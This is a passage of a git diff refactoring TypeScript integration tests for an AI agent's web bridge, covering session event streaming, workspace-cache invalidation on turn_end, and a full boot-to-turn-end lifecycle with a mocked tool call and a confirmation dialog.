-      (seen) => seen.filter((event) => event.type === "live_state_invalidation").length >= 5,
-    );
-    const invalidations = events.filter((event) => event.type === "live_state_invalidation");
-
-    assert.deepEqual(
-      invalidations.map((event) => ({
-        reason: event.reason,
-        source: event.source,
-        workspaceIndexCacheInvalidated: event.workspaceIndexCacheInvalidated,
-      })),
-      [
-        { reason: "agent_end", source: "bridge_event", workspaceIndexCacheInvalidated: true },
-        { reason: "auto_retry_start", source: "bridge_event", workspaceIndexCacheInvalidated: false },
-        { reason: "auto_retry_end", source: "bridge_event", workspaceIndexCacheInvalidated: false },
-        { reason: "auto_compaction_start", source: "bridge_event", workspaceIndexCacheInvalidated: false },
-        { reason: "auto_compaction_end", source: "bridge_event", workspaceIndexCacheInvalidated: false },
-      ],
-      "live_state_invalidation reasons/sources should stay inspectable on /api/session/events",
-    );
-    assert.deepEqual(invalidations[0].domains, ["auto", "workspace", "recovery"]);
-    assert.deepEqual(invalidations[1].domains, ["auto", "recovery"]);
-    assert.deepEqual(invalidations[2].domains, ["auto", "recovery"]);
-    assert.deepEqual(invalidations[3].domains, ["auto", "recovery"]);
-    assert.deepEqual(invalidations[4].domains, ["auto", "recovery"]);
-
-    controller.abort();
-    await waitForMicrotasks();
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const controller = new AbortController();
+  const response = await eventsRoute.GET(
+    new Request("http://localhost/api/session/events", { signal: controller.signal }),
+  );
+
+  harness.emit({ type: "agent_end" });
+  harness.emit({ type: "auto_retry_start", attempt: 1, maxAttempts: 3, delayMs: 250, errorMessage: "retry me" });
+  harness.emit({ type: "auto_retry_end", success: false, attempt: 1, finalError: "still failing" });
+  harness.emit({ type: "auto_compaction_start", reason: "threshold" });
+  harness.emit({ type: "auto_compaction_end", result: undefined, aborted: false, willRetry: false });
+  harness.emit({ type: "turn_end" });
+
+  const events = await readSseEventsUntil(
+    response,
+    (seen) => seen.filter((event) => event.type === "live_state_invalidation").length >= 6,
+  );
+  const invalidations = events.filter((event) => event.type === "live_state_invalidation");
+
+  assert.deepEqual(
+    invalidations.map((event) => ({
+      reason: event.reason,
+      source: event.source,
+      workspaceIndexCacheInvalidated: event.workspaceIndexCacheInvalidated,
+    })),
+    [
+      { reason: "agent_end", source: "bridge_event", workspaceIndexCacheInvalidated: true },
+      { reason: "auto_retry_start", source: "bridge_event", workspaceIndexCacheInvalidated: false },
+      { reason: "auto_retry_end", source: "bridge_event", workspaceIndexCacheInvalidated: false },
+      { reason: "auto_compaction_start", source: "bridge_event", workspaceIndexCacheInvalidated: false },
+      { reason: "auto_compaction_end", source: "bridge_event", workspaceIndexCacheInvalidated: false },
+      { reason: "turn_end", source: "bridge_event", workspaceIndexCacheInvalidated: true },
+    ],
+    "live_state_invalidation reasons/sources should stay inspectable on /api/session/events",
+  );
+  assert.deepEqual(invalidations[0].domains, ["auto", "workspace", "recovery"]);
+  assert.deepEqual(invalidations[1].domains, ["auto", "recovery"]);
+  assert.deepEqual(invalidations[2].domains, ["auto", "recovery"]);
+  assert.deepEqual(invalidations[3].domains, ["auto", "recovery"]);
+  assert.deepEqual(invalidations[4].domains, ["auto", "recovery"]);
+  assert.deepEqual(invalidations[5].domains, ["workspace"]);
+
+  controller.abort();
+  await waitForMicrotasks();
 });
 
-test("workspace cache only busts on real boundaries and session mutations emit targeted invalidations", async () => {
+test("workspace cache only busts on real boundaries and session mutations emit targeted invalidations", async (t) => {
   const fixture = makeWorkspaceFixture();
   const activeSessionPath = createSessionFile(
     fixture.projectCwd,
@@ -489,99 +492,175 @@ test("workspace cache only busts on real boundaries and session mutations emit t
     },
   });
 
-  try {
-    const service = bridge.getProjectBridgeService();
-    await service.ensureStarted();
-    const seenEvents: any[] = [];
-    const unsubscribe = service.subscribe((event) => {
-      seenEvents.push(event);
-    });
-
-    await bridge.collectBootPayload();
-    await bridge.collectBootPayload();
-    assert.equal(workspaceIndexCalls, 1, "boot snapshot should stay cached before any invalidation boundary fires");
-
-    harness.emit({ type: "agent_end" });
-    await waitForMicrotasks();
-    await bridge.collectBootPayload();
-    assert.equal(workspaceIndexCalls, 2, "agent_end should invalidate the cached workspace snapshot");
-
-    harness.emit({ type: "auto_retry_start", attempt: 1, maxAttempts: 3, delayMs: 100, errorMessage: "retry me" });
-    await waitForMicrotasks();
-    await bridge.collectBootPayload();
-    assert.equal(workspaceIndexCalls, 2, "auto_retry_start should not invalidate the workspace snapshot cache");
-
-    harness.emit({ type: "auto_compaction_start", reason: "threshold" });
-    await waitForMicrotasks();
-    await bridge.collectBootPayload();
-    assert.equal(workspaceIndexCalls, 2, "auto_compaction_start should not invalidate the workspace snapshot cache");
-
-    const switchResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "switch_session", sessionPath: otherSessionPath }),
-      }),
-    );
-    assert.equal(switchResponse.status, 200);
-
-    const newSessionResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "new_session" }),
-      }),
-    );
-    assert.equal(newSessionResponse.status, 200);
-
-    const forkResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "fork", entryId: "entry-1" }),
-      }),
-    );
-    assert.equal(forkResponse.status, 200);
-
-    const renameResponse = await manageRoute.POST(
-      new Request("http://localhost/api/session/manage", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "rename",
-          sessionPath: otherSessionPath,
-          name: "Renamed Session",
-        }),
-      }),
-    );
-    const renamePayload = await renameResponse.json() as any;
-    assert.equal(renameResponse.status, 200);
-    assert.equal(renamePayload.success, true);
-    assert.equal(renamePayload.mutation, "session_file");
-
-    await waitForMicrotasks();
-
-    const invalidations = seenEvents.filter((event) => event.type === "live_state_invalidation");
-    const reasons = invalidations.map((event) => event.reason);
-    assert.ok(reasons.includes("agent_end"), "missing agent_end live_state_invalidation trigger");
-    assert.ok(reasons.includes("auto_retry_start"), "missing auto_retry_start live_state_invalidation trigger");
-    assert.ok(reasons.includes("auto_compaction_start"), "missing auto_compaction_start live_state_invalidation trigger");
-    assert.ok(reasons.includes("switch_session"), "missing switch_session live_state_invalidation trigger");
-    assert.ok(reasons.includes("new_session"), "missing new_session live_state_invalidation trigger");
-    assert.ok(reasons.includes("fork"), "missing fork live_state_invalidation trigger");
-
-    const switchInvalidation = invalidations.find((event) => event.reason === "switch_session");
-    assert.ok(switchInvalidation, "switch_session should emit a targeted freshness event");
-    assert.deepEqual(switchInvalidation.domains, ["resumable_sessions", "recovery"]);
-    assert.equal(switchInvalidation.workspaceIndexCacheInvalidated, false);
-
-    const renameInvalidation = invalidations.find(
-      (event) => event.reason === "set_session_name" && event.source === "session_manage",
-    );
-    assert.ok(renameInvalidation, "inactive rename should emit an inspectable set_session_name invalidation");
-    assert.deepEqual(renameInvalidation.domains, ["resumable_sessions"]);
-    assert.equal(renameInvalidation.workspaceIndexCacheInvalidated, false);
-
-    unsubscribe();
-  } finally {
+  t.after(async () => {
     await bridge.resetBridgeServiceForTests();
     onboarding.resetOnboardingServiceForTests();
     fixture.cleanup();
-  }
+  });
+
+  const service = bridge.getProjectBridgeService();
+  await service.ensureStarted();
+  const seenEvents: any[] = [];
+  const unsubscribe = service.subscribe((event) => {
+    seenEvents.push(event);
+  });
+
+  await bridge.collectBootPayload();
+  await bridge.collectBootPayload();
+  assert.equal(workspaceIndexCalls, 1, "boot snapshot should stay cached before any invalidation boundary fires");
+
+  harness.emit({ type: "agent_end" });
+  await waitForMicrotasks();
+  await bridge.collectBootPayload();
+  assert.equal(workspaceIndexCalls, 2, "agent_end should invalidate the cached workspace snapshot");
+
+  harness.emit({ type: "auto_retry_start", attempt: 1, maxAttempts: 3, delayMs: 100, errorMessage: "retry me" });
+  await waitForMicrotasks();
+  await bridge.collectBootPayload();
+  assert.equal(workspaceIndexCalls, 2, "auto_retry_start should not invalidate the workspace snapshot cache");
+
+  harness.emit({ type: "auto_compaction_start", reason: "threshold" });
+  await waitForMicrotasks();
+  await bridge.collectBootPayload();
+  assert.equal(workspaceIndexCalls, 2, "auto_compaction_start should not invalidate the workspace snapshot cache");
+
+  const switchResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "switch_session", sessionPath: otherSessionPath }),
+    }),
+  );
+  assert.equal(switchResponse.status, 200);
+
+  const newSessionResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "new_session" }),
+    }),
+  );
+  assert.equal(newSessionResponse.status, 200);
+
+  const forkResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "fork", entryId: "entry-1" }),
+    }),
+  );
+  assert.equal(forkResponse.status, 200);
+
+  const renameResponse = await manageRoute.POST(
+    new Request("http://localhost/api/session/manage", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "rename",
+        sessionPath: otherSessionPath,
+        name: "Renamed Session",
+      }),
+    }),
+  );
+  const renamePayload = await renameResponse.json() as any;
+  assert.equal(renameResponse.status, 200);
+  assert.equal(renamePayload.success, true);
+  assert.equal(renamePayload.mutation, "session_file");
+
+  await waitForMicrotasks();
+
+  const invalidations = seenEvents.filter((event) => event.type === "live_state_invalidation");
+  const reasons = invalidations.map((event) => event.reason);
+  assert.ok(reasons.includes("agent_end"), "missing agent_end live_state_invalidation trigger");
+  assert.ok(reasons.includes("auto_retry_start"), "missing auto_retry_start live_state_invalidation trigger");
+  assert.ok(reasons.includes("auto_compaction_start"), "missing auto_compaction_start live_state_invalidation trigger");
+  assert.ok(reasons.includes("switch_session"), "missing switch_session live_state_invalidation trigger");
+  assert.ok(reasons.includes("new_session"), "missing new_session live_state_invalidation trigger");
+  assert.ok(reasons.includes("fork"), "missing fork live_state_invalidation trigger");
+
+  const switchInvalidation = invalidations.find((event) => event.reason === "switch_session");
+  assert.ok(switchInvalidation, "switch_session should emit a targeted freshness event");
+  assert.deepEqual(switchInvalidation.domains, ["resumable_sessions", "recovery"]);
+  assert.equal(switchInvalidation.workspaceIndexCacheInvalidated, false);
+
+  const renameInvalidation = invalidations.find(
+    (event) => event.reason === "set_session_name" && event.source === "session_manage",
+  );
+  assert.ok(renameInvalidation, "inactive rename should emit an inspectable set_session_name invalidation");
+  assert.deepEqual(renameInvalidation.domains, ["resumable_sessions"]);
+  assert.equal(renameInvalidation.workspaceIndexCacheInvalidated, false);
+
+  unsubscribe();
+});
+
+test("turn_end events invalidate workspace so milestones list reflects current state (issue #2706)", async (t) => {
+  const fixture = makeWorkspaceFixture();
+  const sessionPath = createSessionFile(
+    fixture.projectCwd,
+    fixture.sessionsDir,
+    "sess-turn",
+    "Turn Session",
+    "2026-03-15T03:32:00.000Z",
+  );
+  let workspaceIndexCalls = 0;
+
+  const harness = createHarness((command, current) => {
+    if (command.type === "get_state") {
+      current.emit({
+        id: command.id,
+        type: "response",
+        command: "get_state",
+        success: true,
+        data: fakeSessionState("sess-turn", sessionPath),
+      });
+      return;
+    }
+
+    assert.fail(`unexpected command: ${command.type}`);
+  });
+
+  setupBridge(harness, fixture, {
+    indexWorkspace: async () => {
+      workspaceIndexCalls += 1;
+      return fakeWorkspaceIndex();
+    },
+  });
+
+  t.after(async () => {
+    await bridge.resetBridgeServiceForTests();
+    onboarding.resetOnboardingServiceForTests();
+    fixture.cleanup();
+  });
+
+  const service = bridge.getProjectBridgeService();
+  await service.ensureStarted();
+  const seenEvents: any[] = [];
+  const unsubscribe = service.subscribe((event) => {
+    seenEvents.push(event);
+  });
+
+  // Load workspace once to prime cache
+  await bridge.collectBootPayload();
+  assert.equal(workspaceIndexCalls, 1, "initial boot should call indexWorkspace once");
+
+  // Emit turn_end — this should invalidate the workspace cache so the
+  // milestones list picks up state changes that occurred during the turn.
+  harness.emit({ type: "turn_end" });
+  await waitForMicrotasks();
+
+  // Verify a live_state_invalidation was emitted for turn_end
+  const invalidations = seenEvents.filter((event) => event.type === "live_state_invalidation");
+  const turnEndInvalidation = invalidations.find((event) => event.reason === "turn_end");
+  assert.ok(turnEndInvalidation, "turn_end should emit a live_state_invalidation event");
+  assert.ok(
+    turnEndInvalidation.domains.includes("workspace"),
+    "turn_end invalidation should include the workspace domain",
+  );
+  assert.equal(
+    turnEndInvalidation.workspaceIndexCacheInvalidated,
+    true,
+    "turn_end should invalidate the workspace index cache",
+  );
+
+  // Verify workspace cache was actually busted
+  await bridge.collectBootPayload();
+  assert.equal(workspaceIndexCalls, 2, "turn_end should bust the workspace index cache so the next fetch re-indexes");
+
+  unsubscribe();
 });
diff --git a/src/tests/integration/web-mode-assembled.test.ts b/src/tests/integration/web-mode-assembled.test.ts
index 5e658ce51..6bc3cafa5 100644
--- a/src/tests/integration/web-mode-assembled.test.ts
+++ b/src/tests/integration/web-mode-assembled.test.ts
@@ -223,7 +223,7 @@ async function readSseEvents(response: Response, count: number, perReadTimeoutMs
 // Assembled lifecycle test
 // ---------------------------------------------------------------------------
 
-test("assembled lifecycle: boot → onboard → prompt → streaming text → tool execution → blocking UI request → UI response → turn boundary", async () => {
+test("assembled lifecycle: boot → onboard → prompt → streaming text → tool execution → blocking UI request → UI response → turn boundary", async (t) => {
   const fixture = makeWorkspaceFixture();
   const authStorage = AuthStorage.inMemory({});
   const sessionPath = createSessionFile(fixture.projectCwd, fixture.sessionsDir, "sess-assembled", "Assembled Lifecycle Session");
@@ -350,234 +350,235 @@ test("assembled lifecycle: boot → onboard → prompt → streaming text → to
 
   onboarding.configureOnboardingServiceForTests({
     authStorage,
+    getEnvApiKey: () => undefined,
     validateApiKey: async () => ({ ok: true, message: "openai credentials validated" }),
   });
 
-  try {
-    // -----------------------------------------------------------------------
-    // Stage 1: Boot — verify bridge ready, onboarding locked
-    // -----------------------------------------------------------------------
-    const bootResponse = await bootRoute.GET();
-    assert.equal(bootResponse.status, 200, "boot endpoint should respond 200");
-    const bootPayload = (await bootResponse.json()) as any;
-    assert.equal(bootPayload.bridge.phase, "ready", "bridge should be ready after boot");
-    assert.equal(bootPayload.onboarding.locked, true, "onboarding should be locked before setup");
-    assert.equal(bootPayload.onboarding.lockReason, "required_setup", "lock reason should be required_setup");
-    assert.equal(spawnCount, 1, "bridge should have spawned once during boot");
-
-    // Verify prompt is blocked while locked
-    const blockedPrompt = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "prompt", message: "should be rejected" }),
-      }),
-    );
-    assert.equal(blockedPrompt.status, 423, "prompt should be locked (423) before onboarding");
-
-    // -----------------------------------------------------------------------
-    // Stage 2: Onboard — save API key, unlock workspace
-    // -----------------------------------------------------------------------
-    const onboardResponse = await onboardingRoute.POST(
-      new Request("http://localhost/api/onboarding", {
-        method: "POST",
-        body: JSON.stringify({
-          action: "save_api_key",
-          providerId: "openai",
-          apiKey: "sk-assembled-test-key",
-        }),
-      }),
-    );
-    assert.equal(onboardResponse.status, 200, "onboarding save_api_key should succeed");
-    const onboardPayload = (await onboardResponse.json()) as any;
-    assert.equal(onboardPayload.onboarding.locked, false, "onboarding should be unlocked after setup");
-    assert.equal(onboardPayload.onboarding.lockReason, null, "lock reason should be null after setup");
-    assert.equal(onboardPayload.onboarding.bridgeAuthRefresh.phase, "succeeded", "bridge auth refresh should succeed");
-    assert.equal(spawnCount, 2, "bridge should have been restarted (spawned again) during auth refresh");
-
-    // -----------------------------------------------------------------------
-    // Stage 3: Subscribe SSE + send prompt
-    // -----------------------------------------------------------------------
-    const sseResponse = await eventsRoute.GET(
-      new Request("http://localhost/api/session/events", { signal: AbortSignal.timeout(10_000) }),
-    );
-    assert.equal(sseResponse.status, 200, "SSE endpoint should respond 200");
-    assert.equal(
-      sseResponse.headers.get("content-type"),
-      "text/event-stream; charset=utf-8",
-      "SSE should have correct content type",
-    );
-
-    // Start reading SSE events in background (reads until count or timeout)
-    const phase1EventsPromise = readSseEvents(sseResponse, 15, 3_000);
-
-    // Send the prompt — triggers fake child's streaming event sequence
-    const promptResponse = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({ type: "prompt", message: "deploy the application" }),
-      }),
-    );
-    assert.equal(promptResponse.status, 200, "prompt should succeed after onboarding");
-    const promptPayload = (await promptResponse.json()) as any;
-    assert.equal(promptPayload.success, true, "prompt RPC response should indicate success");
-    assert.equal(promptPayload.command, "prompt", "prompt RPC response should echo command type");
-
-    // Collect Phase 1 SSE events
-    const phase1Events = await phase1EventsPromise;
-    await waitForMicrotasks();
-
-    // -----------------------------------------------------------------------
-    // Stage 4: Verify streaming events arrived via SSE
-    // -----------------------------------------------------------------------
-    const nonStatusEvents = phase1Events.filter((e) => e.type !== "bridge_status");
-    const eventTypes = nonStatusEvents.map((e) => e.type);
-
-    const messageUpdate = nonStatusEvents.find((e) => e.type === "message_update");
-    assert.ok(
-      messageUpdate,
-      `message_update event should arrive via SSE (got types: ${eventTypes.join(", ")})`,
-    );
-    assert.equal(
-      messageUpdate.assistantMessageEvent.type,
-      "text_delta",
-      "message_update should contain a text_delta",
-    );
-    assert.equal(
-      messageUpdate.assistantMessageEvent.delta,
-      "Deploying to production...",
-      "text_delta should carry the expected content",
-    );
-
-    const toolStart = nonStatusEvents.find((e) => e.type === "tool_execution_start");
-    assert.ok(
-      toolStart,
-      `tool_execution_start event should arrive via SSE (got types: ${eventTypes.join(", ")})`,
-    );
-    assert.equal(toolStart.toolCallId, "tc-deploy-1", "tool start should have correct toolCallId");
-    assert.equal(toolStart.toolName, "bash", "tool start should identify the tool name");
-
-    const toolEnd = nonStatusEvents.find((e) => e.type === "tool_execution_end");
-    assert.ok(
-      toolEnd,
-      `tool_execution_end event should arrive via SSE (got types: ${eventTypes.join(", ")})`,
-    );
-    assert.equal(toolEnd.toolCallId, "tc-deploy-1", "tool end should match the tool start");
-    assert.equal(toolEnd.isError, false, "tool execution should not be an error");
-
-    const uiRequest = nonStatusEvents.find((e) => e.type === "extension_ui_request");
-    assert.ok(
-      uiRequest,
-      `extension_ui_request event should arrive via SSE (got types: ${eventTypes.join(", ")})`,
-    );
-    assert.equal(uiRequest.id, "ui-confirm-deploy", "UI request should have the expected id");
-    assert.equal(uiRequest.method, "confirm", "UI request should be a confirm dialog");
-    assert.equal(uiRequest.title, "Confirm deployment", "UI request should have the expected title");
-    assert.equal(
-      uiRequest.message,
-      "Proceed with deploying to production?",
-      "UI request should have the expected message",
-    );
-
-    // Verify correct event ordering: message_update → tool_start → tool_end → ui_request
-    const msgIdx = nonStatusEvents.indexOf(messageUpdate);
-    const toolStartIdx = nonStatusEvents.indexOf(toolStart);
-    const toolEndIdx = nonStatusEvents.indexOf(toolEnd);
-    const uiReqIdx = nonStatusEvents.indexOf(uiRequest);
-    assert.ok(msgIdx < toolStartIdx, "message_update should precede tool_execution_start");
-    assert.ok(toolStartIdx < toolEndIdx, "tool_execution_start should precede tool_execution_end");
-    assert.ok(toolEndIdx < uiReqIdx, "tool_execution_end should precede extension_ui_request");
-
-    // Verify bridge_status events were also delivered (proves SSE fanout is working)
-    const statusEvents = phase1Events.filter((e) => e.type === "bridge_status");
-    assert.ok(statusEvents.length >= 1, "at least one bridge_status event should arrive via SSE");
-
-    // -----------------------------------------------------------------------
-    // Stage 5: Respond to UI request — prove the round-trip
-    // -----------------------------------------------------------------------
-    const sseResponse2 = await eventsRoute.GET(
-      new Request("http://localhost/api/session/events", { signal: AbortSignal.timeout(10_000) }),
-    );
-
-    // Start reading Phase 2 events in background
-    const phase2EventsPromise = readSseEvents(sseResponse2, 10, 3_000);
-
-    // Send the UI response
-    const uiResponseResult = await commandRoute.POST(
-      new Request("http://localhost/api/session/command", {
-        method: "POST",
-        body: JSON.stringify({
-          type: "extension_ui_response",
-          id: "ui-confirm-deploy",
-          value: true,
-        }),
-      }),
-    );
-    assert.equal(uiResponseResult.status, 202, "extension_ui_response should return 202 (fire-and-forget)");
-
-    // Wait for microtasks to let the stdin write propagate
-    await waitForMicrotasks();
-
-    // Verify the UI response reached the fake child's stdin (round-trip proof)
-    assert.ok(receivedUiResponse, "UI response should have reached the fake child via bridge stdin");
-    assert.equal(receivedUiResponse.id, "ui-confirm-deploy", "UI response id should match the request");
-    assert.equal(receivedUiResponse.value, true, "UI response value should be delivered intact");
-
-    // Collect Phase 2 SSE events (agent_end + turn_end)
-    const phase2Events = await phase2EventsPromise;
-    await waitForMicrotasks();
-
-    // -----------------------------------------------------------------------
-    // Stage 6: Verify turn boundary events
-    // -----------------------------------------------------------------------
-    const phase2NonStatus = phase2Events.filter((e) => e.type !== "bridge_status");
-    const phase2Types = phase2NonStatus.map((e) => e.type);
-
-    const agentEnd = phase2NonStatus.find((e) => e.type === "agent_end");
-    assert.ok(
-      agentEnd,
-      `agent_end event should arrive via SSE after UI response (got types: ${phase2Types.join(", ")})`,
-    );
-
-    const turnEnd = phase2NonStatus.find((e) => e.type === "turn_end");
-    assert.ok(
-      turnEnd,
-      `turn_end event should arrive via SSE after UI response (got types: ${phase2Types.join(", ")})`,
-    );
-
-    // Verify agent_end precedes turn_end
-    const agentEndIdx = phase2NonStatus.indexOf(agentEnd);
-    const turnEndIdx = phase2NonStatus.indexOf(turnEnd);
-    assert.ok(agentEndIdx < turnEndIdx, "agent_end should precede turn_end");
-
-    // -----------------------------------------------------------------------
-    // Summary assertion: the complete assembled pipeline is proven
-    // -----------------------------------------------------------------------
-    const allEventTypes = [
-      ...nonStatusEvents.map((e) => e.type),
-      ...phase2NonStatus.map((e) => e.type),
-    ];
-    const requiredTypes = [
-      "message_update",
-      "tool_execution_start",
-      "tool_execution_end",
-      "extension_ui_request",
-      "agent_end",
-      "turn_end",
-    ];
-    for (const required of requiredTypes) {
-      assert.ok(
-        allEventTypes.includes(required),
-        `complete pipeline must include ${required} (got: ${allEventTypes.join(", ")})`,
-      );
-    }
-  } finally {
+  t.after(async () => {
     onboarding.resetOnboardingServiceForTests();
     await bridge.resetBridgeServiceForTests();
     fixture.cleanup();
+  });
+
+  // -----------------------------------------------------------------------
+  // Stage 1: Boot — verify bridge ready, onboarding locked
+  // -----------------------------------------------------------------------
+  const bootResponse = await bootRoute.GET();
+  assert.equal(bootResponse.status, 200, "boot endpoint should respond 200");
+  const bootPayload = (await bootResponse.json()) as any;
+  assert.equal(bootPayload.bridge.phase, "ready", "bridge should be ready after boot");
+  assert.equal(bootPayload.onboarding.locked, true, "onboarding should be locked before setup");
+  assert.equal(bootPayload.onboarding.lockReason, "required_setup", "lock reason should be required_setup");
+  assert.equal(spawnCount, 1, "bridge should have spawned once during boot");
+
+  // Verify prompt is blocked while locked
+  const blockedPrompt = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "prompt", message: "should be rejected" }),
+    }),
+  );
+  assert.equal(blockedPrompt.status, 423, "prompt should be locked (423) before onboarding");
+
+  // -----------------------------------------------------------------------
+  // Stage 2: Onboard — save API key, unlock workspace
+  // -----------------------------------------------------------------------
+  const onboardResponse = await onboardingRoute.POST(
+    new Request("http://localhost/api/onboarding", {
+      method: "POST",
+      body: JSON.stringify({
+        action: "save_api_key",
+        providerId: "openai",
+        apiKey: "sk-assembled-test-key",
+      }),
+    }),
+  );
+  assert.equal(onboardResponse.status, 200, "onboarding save_api_key should succeed");
+  const onboardPayload = (await onboardResponse.json()) as any;
+  assert.equal(onboardPayload.onboarding.locked, false, "onboarding should be unlocked after setup");
+  assert.equal(onboardPayload.onboarding.lockReason, null, "lock reason should be null after setup");
+  assert.equal(onboardPayload.onboarding.bridgeAuthRefresh.phase, "succeeded", "bridge auth refresh should succeed");
+  assert.equal(spawnCount, 2, "bridge should have been restarted (spawned again) during auth refresh");
+
+  // -----------------------------------------------------------------------
+  // Stage 3: Subscribe SSE + send prompt
+  // -----------------------------------------------------------------------
+  const sseResponse = await eventsRoute.GET(
+    new Request("http://localhost/api/session/events", { signal: AbortSignal.timeout(10_000) }),
+  );
+  assert.equal(sseResponse.status, 200, "SSE endpoint should respond 200");
+  assert.equal(
+    sseResponse.headers.get("content-type"),
+    "text/event-stream; charset=utf-8",
+    "SSE should have correct content type",
+  );
+
+  // Start reading SSE events in background (reads until count or timeout)
+  const phase1EventsPromise = readSseEvents(sseResponse, 15, 3_000);
+
+  // Send the prompt — triggers fake child's streaming event sequence
+  const promptResponse = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({ type: "prompt", message: "deploy the application" }),
+    }),
+  );
+  assert.equal(promptResponse.status, 200, "prompt should succeed after onboarding");
+  const promptPayload = (await promptResponse.json()) as any;
+  assert.equal(promptPayload.success, true, "prompt RPC response should indicate success");
+  assert.equal(promptPayload.command, "prompt", "prompt RPC response should echo command type");
+
+  // Collect Phase 1 SSE events
+  const phase1Events = await phase1EventsPromise;
+  await waitForMicrotasks();
+
+  // -----------------------------------------------------------------------
+  // Stage 4: Verify streaming events arrived via SSE
+  // -----------------------------------------------------------------------
+  const nonStatusEvents = phase1Events.filter((e) => e.type !== "bridge_status");
+  const eventTypes = nonStatusEvents.map((e) => e.type);
+
+  const messageUpdate = nonStatusEvents.find((e) => e.type === "message_update");
+  assert.ok(
+    messageUpdate,
+    `message_update event should arrive via SSE (got types: ${eventTypes.join(", ")})`,
+  );
+  assert.equal(
+    messageUpdate.assistantMessageEvent.type,
+    "text_delta",
+    "message_update should contain a text_delta",
+  );
+  assert.equal(
+    messageUpdate.assistantMessageEvent.delta,
+    "Deploying to production...",
+    "text_delta should carry the expected content",
+  );
+
+  const toolStart = nonStatusEvents.find((e) => e.type === "tool_execution_start");
+  assert.ok(
+    toolStart,
+    `tool_execution_start event should arrive via SSE (got types: ${eventTypes.join(", ")})`,
+  );
+  assert.equal(toolStart.toolCallId, "tc-deploy-1", "tool start should have correct toolCallId");
+  assert.equal(toolStart.toolName, "bash", "tool start should identify the tool name");
+
+  const toolEnd = nonStatusEvents.find((e) => e.type === "tool_execution_end");
+  assert.ok(
+    toolEnd,
+    `tool_execution_end event should arrive via SSE (got types: ${eventTypes.join(", ")})`,
+  );
+  assert.equal(toolEnd.toolCallId, "tc-deploy-1", "tool end should match the tool start");
+  assert.equal(toolEnd.isError, false, "tool execution should not be an error");
+
+  const uiRequest = nonStatusEvents.find((e) => e.type === "extension_ui_request");
+  assert.ok(
+    uiRequest,
+    `extension_ui_request event should arrive via SSE (got types: ${eventTypes.join(", ")})`,
+  );
+  assert.equal(uiRequest.id, "ui-confirm-deploy", "UI request should have the expected id");
+  assert.equal(uiRequest.method, "confirm", "UI request should be a confirm dialog");
+  assert.equal(uiRequest.title, "Confirm deployment", "UI request should have the expected title");
+  assert.equal(
+    uiRequest.message,
+    "Proceed with deploying to production?",
+    "UI request should have the expected message",
+  );
+
+  // Verify correct event ordering: message_update → tool_start → tool_end → ui_request
+  const msgIdx = nonStatusEvents.indexOf(messageUpdate);
+  const toolStartIdx = nonStatusEvents.indexOf(toolStart);
+  const toolEndIdx = nonStatusEvents.indexOf(toolEnd);
+  const uiReqIdx = nonStatusEvents.indexOf(uiRequest);
+  assert.ok(msgIdx < toolStartIdx, "message_update should precede tool_execution_start");
+  assert.ok(toolStartIdx < toolEndIdx, "tool_execution_start should precede tool_execution_end");
+  assert.ok(toolEndIdx < uiReqIdx, "tool_execution_end should precede extension_ui_request");
+
+  // Verify bridge_status events were also delivered (proves SSE fanout is working)
+  const statusEvents = phase1Events.filter((e) => e.type === "bridge_status");
+  assert.ok(statusEvents.length >= 1, "at least one bridge_status event should arrive via SSE");
+
+  // -----------------------------------------------------------------------
+  // Stage 5: Respond to UI request — prove the round-trip
+  // -----------------------------------------------------------------------
+  const sseResponse2 = await eventsRoute.GET(
+    new Request("http://localhost/api/session/events", { signal: AbortSignal.timeout(10_000) }),
+  );
+
+  // Start reading Phase 2 events in background
+  const phase2EventsPromise = readSseEvents(sseResponse2, 10, 3_000);
+
+  // Send the UI response
+  const uiResponseResult = await commandRoute.POST(
+    new Request("http://localhost/api/session/command", {
+      method: "POST",
+      body: JSON.stringify({
+        type: "extension_ui_response",
+        id: "ui-confirm-deploy",
+        value: true,
+      }),
+    }),
+  );
+  assert.equal(uiResponseResult.status, 202, "extension_ui_response should return 202 (fire-and-forget)");
+
+  // Wait for microtasks to let the stdin write propagate
+  await waitForMicrotasks();
+
+  // Verify the UI response reached the fake child's stdin (round-trip proof)
+  assert.ok(receivedUiResponse, "UI response should have reached the fake child via bridge stdin");
+  assert.equal(receivedUiResponse.id, "ui-confirm-deploy", "UI response id should match the request");
+  assert.equal(receivedUiResponse.value, true, "UI response value should be delivered intact");
+
+  // Collect Phase 2 SSE events (agent_end + turn_end)
+  const phase2Events = await phase2EventsPromise;
+  await waitForMicrotasks();
+
+  // -----------------------------------------------------------------------
+  // Stage 6: Verify turn boundary events
+  // -----------------------------------------------------------------------
+  const phase2NonStatus = phase2Events.filter((e) => e.type !== "bridge_status");
+  const phase2Types = phase2NonStatus.map((e) => e.type);
+
+  const agentEnd = phase2NonStatus.find((e) => e.type === "agent_end");
+  assert.ok(
+    agentEnd,
+    `agent_end event should arrive via SSE after UI response (got types: ${phase2Types.join(", ")})`,
+  );
+
+  const turnEnd = phase2NonStatus.find((e) => e.type === "turn_end");
+  assert.ok(
+    turnEnd,
+    `turn_end event should arrive via SSE after UI response (got types: ${phase2Types.join(", ")})`,
+  );
+
+  // Verify agent_end precedes turn_end
+  const agentEndIdx = phase2NonStatus.indexOf(agentEnd);
